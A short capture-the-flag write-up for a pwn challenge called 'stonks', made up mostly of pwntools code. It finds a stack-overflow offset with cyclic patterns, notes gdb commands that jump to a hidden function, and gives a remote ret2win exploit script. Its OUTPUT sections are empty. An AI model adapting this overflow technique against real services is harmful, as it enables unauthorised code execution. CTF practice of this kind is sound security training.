pwn

stonks

Solved By : Taz and thewhiteh4t

from pwn import *

p = process("./chal")
p.sendline(cyclic(200, n=8)) # n -> architecture | 8 -> 64bit
p.wait()

core = p.corefile
offset = cyclic_find(core.read(core.rsp, 8), n=8)
print(offset)

OUTPUT :

info functions

b main
run
jump ai_debug

OUTPUT :

Exploit :

#!/usr/bin/python3

from pwn import *

host = 'stonks.hsc.tf'
port = 1337
offset = 40
addr = 0x401258
ret = 0x4012f3

junk = b'A' * offset
le_num = p64(addr)
le_ret = p64(ret)
buffer = junk + le_ret + le_num

conn = remote(host, port)
conn.recvuntil('symbol:')
conn.sendline(buffer)
conn.interactive()

OUTPUT :